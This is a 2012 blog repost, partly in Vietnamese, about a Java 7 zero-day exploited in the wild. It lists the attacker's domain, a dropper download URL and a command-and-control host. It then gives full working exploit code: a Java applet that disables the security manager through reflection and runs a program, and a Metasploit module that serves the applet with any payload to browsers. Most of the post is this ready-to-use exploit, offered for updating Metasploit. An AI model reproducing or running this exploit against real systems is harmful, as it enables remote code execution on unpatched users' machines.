New Post

Sunday, September 23, 2012

New Java zero-day vulnerability has been spotted in the wild. We have seen this unpatched exploit being used in limited targeted attacks. Most of the recent Java run-time environments i.e., JRE 1.7x are vulnerable. In my lab environment, I was able to successfully exploit my test machine against latest version of FireFox with JRE version 1.7 update 6 installed.

Name:  6a00d835018afd53ef017c317aac83970b-650wi.jpg Views: 53 Size:  10.3 KB

Initial exploit is hosted on a domain named ok.XXX4.net. Currently this domain is resolving to an IP address in China. Attacker web site is fully functional at the time of writing this article i.e., on August 26, 2012.

Name:  6a00d835018afd53ef01761771b963970c-650wi.jpg Views: 48 Size:  20.1 KB

A successful exploit attempt can result in a dropper (Dropper.MsPMs) getting installed on infected systems. The dropper executable is located on the same server.

http://ok.XXX4.net/meeting/hi.exe

Dropper.MsPMs further talks to its own CnC domain hello.icon.pk which is currently resolving to an IP address 223.25.233.244 located in Singapore.

Name:  6a00d835018afd53ef017744583242970d-650wi.jpg Views: 36 Size:  21.3 KB

It's just a matter of time that a POC will be released and other bad guys will get hold of this exploit as well. It will be interesting to see when Oracle plans for a patch, until then most of the Java users are at the mercy of this exploit. Our investigation is not over yet; more details will be shared on a periodic basis.

Source:

Code:
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
Update code exploit:


































1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
//
// CVE-2012-XXXX Java 0day
//
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
public class Gondvv extends Applet
{
    public Gondvv()
    {
    }
    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }
    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }
    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
Update exploit cho Metasploit. Bạn có thể update metasploit để cập nhập.


































1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   <a href="http://metasploit.com/" target="_blank">http://metasploit.com/</a>
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({ :javascript => false })
    def initialize( info = {} )
        super( update_info( info,
            'Name'          => 'Java 7 Applet Remote Code Execution',
            'Description'   => %q{
                    This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
                Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
                no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
                and Firefox across different platforms.
            },
            'License'       => MSF_LICENSE,
            'Author'        =>
                [
                    'Unknown', # Vulnerability Discovery
                    'jduck', # metasploit module
                    'sinn3r', # metasploit module
                    'juan vazquez', # metasploit module
                ],
            'References'    =>
                [
                    #[ 'CVE', '' ],
                    #[ 'OSVDB', '' ],
                    [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
                ],
            'Platform'      => [ 'java', 'win', 'linux' ],
            'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
            'Targets'       =>
                [
                    [ 'Generic (Java Payload)',
                        {
                            'Arch' => ARCH_JAVA,
                        }
                    ],
                    [ 'Windows Universal',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'win'
                        }
                    ],
                    [ 'Linux x86',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'linux'
                        }
                    ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Aug 26 2012'
            ))
    end
    def on_request_uri( cli, request )
        if not request.uri.match(/\.jar$/i)
            if not request.uri.match(/\/$/)
                send_redirect(cli, get_resource() + '/', '')
                return
            end
            print_status("#{self.name} handling request")
            send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
            return
        end
        paths = [
            [ "Exploit.class" ]
        ]
        p = regenerate_payload(cli)
        jar  = p.encoded_jar
        paths.each do |path|
            1.upto(path.length - 1) do |idx|
                full = path[0,idx].join("/") + "/"
                if !(jar.entries.map{|e|e.name}.include?(full))
                    jar.add_file(full, '')
                end
            end
            fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
            data = fd.read(fd.stat.size)
            jar.add_file(path.join("/"), data)
            fd.close
        end
        print_status("Sending Applet.jar")
        send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
        handler( cli )
    end
    def generate_html
        html  = "<html><head></head>"
        html += "<body>"
        html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
        html += "</applet></body></html>"
        return html
    end
end

0 nhận xét:

Post a Comment